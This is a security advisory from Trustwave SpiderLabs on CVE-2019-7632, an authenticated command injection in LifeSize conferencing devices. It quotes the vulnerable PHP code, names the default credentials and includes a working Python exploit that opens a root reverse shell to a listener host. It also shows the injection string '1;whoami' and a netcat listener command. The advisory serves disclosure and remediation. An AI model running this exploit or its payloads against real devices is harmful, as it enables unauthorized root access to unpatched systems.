Trustwave SpiderLabs Security Advisory TWSL2019-001:
Vulnerabilities in LifeSize Products

Published: 02/07/2019 
Version: 2.0 (02/28/2019)
Edits: CVE number and POC code added

Vendor: LifeSize (https://www.lifesize.com)
Product: Team, Room, Passport & Networker
Version affected: ALL


Product description:
HD Video Conferencing Solutions


Finding: Authenticated Remote OS Command Injection
Credit: Simon Kenin of Trustwave 
CVE: CVE-2019-7632
CWE: CWE-78

All LifeSize products that use PHP for the GUI suffer from many Command Injection attacks.

Looking at the PHP code of mtusize.php under /support/ for example:

$new_mtu_size=$_REQUEST['mtu_size'];
{
	print("<hr>\n");
	$output = shell_exec( "/usr/local/lifesize/cli/mtusize set $new_mtu_size" );
	echo "<pre>$output</pre>";
}

A user input is taken as is from $_REQUEST['mtu_size'] and than passed without any validation into "shell_exec",
allowing an authenticated attacker to inject any code to run on the system.
For example the value "1;whoami" would inject the command whoami and run it on the system.

The directory /support/ requires authentication, however the default is cli:lifesize, which bypasses the need for authentication in many cases. 

In order to show the severity of the issue, included a proof of concept code which spawns a reverse shell from the attacked product with root privileges:

LargerThanLife.py
==================

import requests
from requests.auth import HTTPBasicAuth
from multiprocessing import Process
import sys

#ignore ssl warnings
requests.packages.urllib3.disable_warnings()


print "LifeSize Team/Room/Passport/Networker Remote Command Injection Exploit \n"
print "This PoC sends a reverse shell, start a netcat listener to catch it (nc -lvp 81) \n"
print "Usage: LargerThanLife.py lifesize_ip listener_ip listener_port \n"

life_ip = sys.argv[1]
lis_ip = sys.argv[2]
lis_port = sys.argv[3]

#basic reverse shell payload
pay = 'bash -i >& /dev/tcp/' + lis_ip + '/' + lis_port + ' 0>&1'

#base64 encode the payload
pay2 = pay.encode('base64')

#.encode('base64') add another char in the end for some reason, lets remove it 
pay2 = pay2[:-1]

#final payload levereging LPE from https://github.com/XiphosResearch/exploits/tree/master/deathsize
#without it our shell will have apache permissions
payload = '1;cd /tmp && echo ' + pay2 + ' | openssl enc -base64 -d >reset_tcpdump && chmod 755 reset_tcpdump && PATH=.:$PATH tcpdump_manager'

#Vulnerable php file
url = 'https://' + life_ip + '/support/mtusize.php'

#sending the request, shell should pop in any second
r = requests.post(url , verify=False , auth=HTTPBasicAuth('cli', 'lifesize'), data = {'mtu_size':payload})
if r.status_code != 200:
	print "something went wrong, like wrong user:pass for support panel"
else:
	print "check your listener for a shell"
	

Vendor Response: While initially unwilling to patch due to devices being considered End Of Sale and End Of Life, Lifesize announced that they will have a hotfix available. "We encourage all customers using Lifesize 220 Series systems to contact Lifesize support for a hotfix. Our support teams can be reached by telephone, email or by opening a support ticket. For more information, visit: https://www.lifesize.com/en/support/contact-support" 

Remediation Steps:
All user input from $_REQUEST should be sanitized and validated before passing it into shell_exec. Administrators of these devices should contact Lifesize for a hotfix. They should also change the default password and consider segmenting affected devices onto their own monitored network.

Revision History:
11/03/2018 : Outreach with no response
01/09/2019 : New outreach and vulnerability disclosed to vendor
01/10/2019 : Vendor refuses to patch due to devices being considered EOS/EOL
02/06/2019 : Vendor announces the release of a hotfix
02/07/2019 : Advisory published


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.